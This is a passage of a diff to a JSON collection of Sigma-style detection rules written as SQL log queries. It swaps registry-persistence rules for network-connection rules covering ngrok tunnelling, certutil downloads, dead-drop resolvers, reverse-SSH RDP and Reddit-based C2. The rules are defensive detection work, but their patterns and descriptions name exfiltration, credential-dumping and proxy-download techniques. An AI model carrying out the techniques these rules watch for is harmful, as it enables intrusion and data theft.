"SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND NewValue LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_scrobj_dll.yml" + "filename": "net_connection_win_susp_outbound_smtp_connections.yml" }, { - "title": "Registry Modification to Hidden File Extension", - "id": 
"5df86130-4e95-4a54-90f7-26541b40aec2", - "status": "test", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", + "status": "experimental", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Administrative scripts" + "Legitimate use of ngrok" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)')))" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" ], - "filename": "registry_set_hidden_extention.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "UAC 
Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", - "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "status": "test", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. 
The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ "attack.command_and_control", "attack.t1105" 
@@ -34718,4656 +34576,4829 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", + "status": "experimental", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron 
Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" + "attack.defense_evasion" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", - "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Legitimate usage of remote PowerShell, e.g. 
remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": 
"registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", - "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "status": "experimental", + "description": "Detects suspicious network connection by Cmstp", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", 
- "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE 
'\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 
'%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' 
ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.command_and_control", + "attack.t1105" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "Potential 
Credential Dumping Attempt Using New NetworkProvider - REG", - "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", - "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wuauclt Network Connection", + "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "status": "test", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Legitimate use of wuauclt.exe over the network." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" ], - "filename": "registry_set_new_network_provider.yml" + "filename": "net_connection_win_wuauclt_network_connection.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", "status": "experimental", - "description": "Detects when the enablement of 
developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "title": "Msiexec Initiated Connection", + "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", + "status": "test", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "Legitimate msiexec over networks" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_msiexec.yml" }, { - "title": "ETW Logging Disabled For SCM", - "id": "4f281b83-0200-4b34-bf35-d24687ea57c2", + "title": "Suspicious Non-Browser Network Communication With Reddit API", + "id": "d7b09985-95a3-44be-8450-b6eadf49833e", "status": "experimental", - "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2", + "author": "Gavin Knapp", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.command_and_control", + "attack.t1102" ], "falsepositives": [ - "Unknown" + 